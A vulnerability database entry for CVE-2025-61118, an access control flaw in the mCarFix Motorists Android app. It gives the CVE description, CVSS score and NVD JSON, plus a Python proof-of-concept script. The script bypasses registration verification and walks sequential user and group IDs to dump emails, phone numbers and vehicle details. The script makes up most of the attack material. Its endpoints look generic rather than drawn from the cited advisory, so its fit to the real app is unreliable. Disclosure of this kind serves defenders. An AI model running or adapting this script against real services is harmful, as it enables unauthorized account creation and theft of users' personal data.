CVE-2025-61118

Description

mCarFix Motorists App version 2.3 (package name com.skytop.mcarfix), developed by Paniel Mwaura, contains improper access control vulnerabilities. Attackers may bypass verification to arbitrarily register accounts, and by tampering with sequential numeric IDs, gain unauthorized access to user data and groups. Successful exploitation could result in fake account creation, privacy breaches, and misuse of the platform.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

mCarFix Motorists App v2.3 (com.skytop.mcarfix)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61118 PoC - mCarFix Motorists App Access Control Bypass # Author: Security Researcher # Description: Exploits improper access control in mCarFix Motorists App v2.3 import requests import json TARGET_HOST = "http://target-app.com" # Replace with actual target def exploit_registration_bypass(): """ Step 1: Bypass registration verification to create arbitrary accounts """ print("[+] Step 1: Exploiting registration bypass...") # Original registration request (intercepted) registration_endpoint = f"{TARGET_HOST}/api/v1/user/register" # Payload to bypass verification payload = { "username": "attacker_account", "email": "[email protected]", "password": "Password123!", "verification_code": "", # Bypass by removing/emptying verification "phone": "+1234567890" } headers = { "Content-Type": "application/json", "User-Agent": "Dalvik/2.1.0 (Linux; U; Android 11)" } try: response = requests.post(registration_endpoint, json=payload, headers=headers) if response.status_code == 200: data = response.json() print(f"[+] Account created successfully: {data}") return data.get("user_id") else: print(f"[-] Registration failed: {response.status_code}") return None except Exception as e: print(f"[-] Error: {e}") return None def exploit_idor_access(start_id, end_id): """ Step 2: Exploit IDOR by tampering sequential numeric IDs to access user data """ print(f"[+] Step 2: Exploiting IDOR vulnerability (ID range: {start_id}-{end_id})...") user_data_endpoint = f"{TARGET_HOST}/api/v1/user/profile" for user_id in range(start_id, end_id + 1): try: # Tamper with user_id parameter params = {"user_id": user_id} response = requests.get(user_data_endpoint, params=params) if response.status_code == 200: data = response.json() print(f"[+] Found user data - ID {user_id}: {json.dumps(data, indent=2)}") # Extract sensitive information if "email" in data: print(f" Email: {data['email']}") if "phone" in data: print(f" Phone: {data['phone']}") if "vehicle_info" in data: print(f" Vehicle: {data['vehicle_info']}") except Exception as e: print(f"[-] Error accessing ID {user_id}: {e}") def exploit_group_access(): """ Step 3: Access unauthorized group data via IDOR """ print("[+] Step 3: Exploiting group IDOR vulnerability...") group_endpoint = f"{TARGET_HOST}/api/v1/group/info" for group_id in range(1, 100): try: params = {"group_id": group_id} response = requests.get(group_endpoint, params=params) if response.status_code == 200: data = response.json() print(f"[+] Found group - ID {group_id}: {data.get('name', 'Unknown')}") print(f" Members: {data.get('member_count', 0)}") except Exception as e: continue if __name__ == "__main__": print("="*60) print("CVE-2025-61118 PoC - mCarFix Motorists App Exploitation") print("="*60) # Execute attack chain user_id = exploit_registration_bypass() if user_id: # Access other users' data exploit_idor_access(1, 50) # Access group information exploit_group_access() print("\n[!] PoC execution completed. Target may be compromised.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61118
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61118
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61118/
[4] VulDB https://vuldb.com/cve/CVE-2025-61118
[5] https://kar1oz.notion.site/mCarFix-Motorists-App-2629a473ecb280ac8679c73098423cf0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61118", "sourceIdentifier": "[email protected]", "published": "2025-10-30T16:15:36.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "mCarFix Motorists App version 2.3 (package name com.skytop.mcarfix), developed by Paniel Mwaura, contains improper access control vulnerabilities. Attackers may bypass verification to arbitrarily register accounts, and by tampering with sequential numeric IDs, gain unauthorized access to user data and groups. Successful exploitation could result in fake account creation, privacy breaches, and misuse of the platform."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://kar1oz.notion.site/mCarFix-Motorists-App-2629a473ecb280ac8679c73098423cf0", "source": "[email protected]"}]}}